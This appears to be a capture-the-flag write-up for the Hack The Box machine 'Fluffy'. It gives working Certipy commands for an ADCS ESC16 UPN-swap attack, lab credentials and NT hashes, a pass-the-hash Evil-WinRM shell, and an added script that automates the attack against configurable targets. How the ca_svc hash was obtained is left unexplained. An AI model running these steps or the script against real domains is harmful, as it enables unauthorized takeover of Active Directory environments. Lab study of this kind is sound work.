# HTB Machine: Fluffy

# Recon

Enumeration identified the domain fluffy.htb and a domain controller at 10.10.11.69. Further enumeration showed that ADCS (Active Directory Certificate Services) is running, alongside the standard Kerberos and LDAP services.

# Initial Access

# Brute Force

Brute-forced credentials led to a valid set:

  • **Username**: `P.AGILA@fluffy.htb`
  • **Password**: `prometheusx-303`

# File Metadata Clue

Running exiftool on a file retrieved from the share revealed the author p.agila, confirming the first-initial.surname username format and the identity behind the credentials.

# Abuse of Certificate Template

Attempted a shadow credentials attack with Certipy (`certipy-ad shadow`), but it failed with timeouts. The cause was clock skew: the attack authenticates with Kerberos (PKINIT), and the DC rejects requests when the client clock differs from its own by more than the default tolerance of five minutes.

# Fixing Time Sync

```bash
sudo ntpdate 10.10.11.69
```

ntpdate (on a current Kali this is a wrapper around ntpsec's ntpdig) reported that no eligible servers were found, so the walkthrough continued after setting the clock by hand, on the assumption that the local time is now within the Kerberos tolerance. If Certipy keeps timing out, re-check the offset against the DC before anything else.

# Enumeration with Certipy

Used Certipy to read the attributes of the ca_svc account, authenticating as ca_svc with its NT hash (the `-hashes` value is `LM:NT` with the LM half left empty):

```bash
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -user 'ca_svc' read
```

The output confirmed the service account and its SPN:

```text
servicePrincipalName: ADCS/ca.fluffy.htb
```

# User Principal Name Hijack

Overwrote the userPrincipalName of ca_svc with `administrator`. This requires write rights over the ca_svc object's attributes; note the original value (`ca_svc@fluffy.htb`, as shown in the read output) before changing it, because it has to be restored later.

```bash
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update
```

# Certificate Request as Administrator

Requested a certificate from the User template while the spoofed UPN was in place. The CA copies the requesting account's current UPN into the certificate's subject alternative name:

```bash
certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 \
-target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
```

Certipy saved the result as administrator.pfx, a certificate whose UPN names the Administrator account. This UPN-swap sequence is what Certipy documents as ESC16: it only works because this CA does not embed the requester's SID in issued certificates (the szOID_NTDS_CA_SECURITY_EXT security extension is disabled) and the DC is not enforcing strong certificate mapping, so the DC later resolves the certificate by UPN alone. Certipy's `find` output reports this condition.

# Revert Changes

Restored the UPN of ca_svc to its original value. This step is not just cleanup: as long as ca_svc still carries the UPN `administrator`, the DC would map the certificate back to ca_svc instead of to the real Administrator account.

```bash
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 \
-upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
```

# Authenticate as Administrator

Used the certificate for PKINIT to obtain a TGT as administrator; Certipy then uses that TGT to recover the account's NT hash.

```bash
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69
```

Successfully obtained the hash (LM:NT; the LM half is the empty-password constant):

```text
aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```
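The following script is an added example and is not part of the original writeup. It wraps the sequence above (clock check, read the current UPN, swap it, request the certificate, revert, authenticate) so that ca_svc's original UPN is recorded first and restored by an EXIT trap even if the request fails half-way, which is the mistake that otherwise leaves the account broken. It assumes the `certipy-ad` CLI as used on this page, the "attribute : value" line layout of `certipy-ad account ... read` output, classic `ntpdate -q` output for the offset line, and that Certipy names the .pfx after the local part of the UPN (as it did here with administrator.pfx); none of these are confirmed by the page beyond the commands shown.

```shell
#!/bin/sh
# Added example, not the writeup's own code: wrapper around the Certipy UPN-swap
# sequence. Checks clock skew first (the Kerberos failure mode hit earlier),
# records the current UPN, reverts it on any failure via an EXIT trap, and only
# then authenticates with the certificate.
# Assumptions (not confirmed by the page): "attribute : value" layout of
# `certipy-ad account ... read` output, classic `ntpdate -q` output, and that
# Certipy names the .pfx after the local part of the UPN.
# Usage: sh upn_swap.sh run    (without "run" only the helper functions load)

DC_IP="${DC_IP:-10.10.11.69}"
DC_HOST="${DC_HOST:-DC01.fluffy.htb}"
CA_NAME="${CA_NAME:-fluffy-DC01-CA}"
TEMPLATE="${TEMPLATE:-User}"
DOMAIN="${DOMAIN:-fluffy.htb}"
CTRL_USER="${CTRL_USER:-ca_svc}"                              # account whose UPN we can write
CTRL_HASH="${CTRL_HASH:-:ca0f4f9e9eb8a092addf53bb03fc98c8}"   # LM:NT, LM half empty
TARGET_UPN="${TARGET_UPN:-administrator}"                     # UPN to impersonate
SKEW_LIMIT=300                                                # Kerberos default max skew, seconds
AUTH="-u $CTRL_USER -hashes $CTRL_HASH -dc-ip $DC_IP"        # used unquoted on purpose: split into args

# Pull one attribute out of `certipy-ad account ... read` output on stdin,
# where each line looks like "    userPrincipalName : ca_svc@fluffy.htb".
extract_attr() {
  sed -n "s/^[[:space:]]*$1[[:space:]]*:[[:space:]]*//p" | head -n 1
}

# Parse the offset (seconds) from classic `ntpdate -q` output on stdin, e.g.
# "server 10.10.11.69, stratum 1, offset +394.812345, delay 0.05125".
ntp_offset() {
  sed -n 's/.*offset \([-+0-9.]*\).*/\1/p' | sed 's/^+//' | head -n 1
}

# Succeeds when |offset| is inside the Kerberos tolerance, fails otherwise.
skew_ok() {
  awk -v off="${1#+}" -v lim="$SKEW_LIMIT" \
    'BEGIN { if (off < 0) off = -off; if (off < lim) exit 0; exit 1 }'
}

# Certipy saved administrator.pfx for UPN "administrator" on the page; strip any
# @domain suffix so a fully qualified UPN yields the same file name.
pfx_name() { printf '%s.pfx\n' "${1%%@*}"; }

ORIG_UPN=""
restore_upn() {
  if [ -n "$ORIG_UPN" ]; then
    certipy-ad account $AUTH -user "$CTRL_USER" -upn "$ORIG_UPN" update
  fi
}

main() {
  # 1. Refuse to start if the clock is too far off; PKINIT would only time out.
  off=$(ntpdate -q "$DC_IP" 2>/dev/null | ntp_offset)
  if [ -n "$off" ] && ! skew_ok "$off"; then
    echo "clock skew ${off}s exceeds ${SKEW_LIMIT}s; sync first (sudo ntpdate $DC_IP)" >&2
    return 1
  fi
  # 2. Record the original UPN so it can be put back exactly as it was.
  ORIG_UPN=$(certipy-ad account $AUTH -user "$CTRL_USER" read | extract_attr userPrincipalName)
  if [ -z "$ORIG_UPN" ]; then
    echo "could not read the current UPN of $CTRL_USER" >&2
    return 1
  fi
  trap restore_upn EXIT           # revert even if the request below fails
  # 3. Swap the UPN and request a certificate; the CA copies the UPN into it.
  certipy-ad account $AUTH -user "$CTRL_USER" -upn "$TARGET_UPN" update
  certipy-ad req $AUTH -target "$DC_HOST" -ca "$CA_NAME" -template "$TEMPLATE"
  # 4. Restore before authenticating so the UPN in the cert maps to the real
  #    account rather than back to $CTRL_USER.
  restore_upn
  trap - EXIT
  ORIG_UPN=""
  # 5. PKINIT with the certificate; Certipy prints the impersonated account's NT hash.
  certipy-ad auth -pfx "$(pfx_name "$TARGET_UPN")" -username "${TARGET_UPN%%@*}" \
    -domain "$DOMAIN" -dc-ip "$DC_IP"
}

if [ "${1-}" = "run" ]; then
  main
fi
```

The EXIT trap is the important part: if `req` fails after the UPN has been changed, the original value still goes back, and the trap is cleared only after the explicit restore so the revert never runs twice.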

# Exploiting with Evil-WinRM

Used Evil-WinRM with pass-the-hash (the NT half only) to get a shell as administrator:

```bash
evil-winrm -i 10.10.11.69 -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'
```

# Root Flag Captured

You now have full administrative access. Capture the flag and own the box.

---

# Summary

  • Brute-forced credentials led to initial access.
  • Identified certificate misconfiguration via ADCS.
  • Hijacked UPN to impersonate Administrator.
  • Requested a certificate with the spoofed UPN, reverted the UPN, and recovered Administrator's NT hash via PKINIT.
  • Used Evil-WinRM for shell access.

This is a great example of abusing ADCS misconfigurations to escalate privileges in a Windows domain.

Alternative initial access: the PDF on the share references a 2025 CVE; craft a zip that exploits it, drop it on the IT SMB share, and run Responder to capture the NTLM hash of the user who opens it.
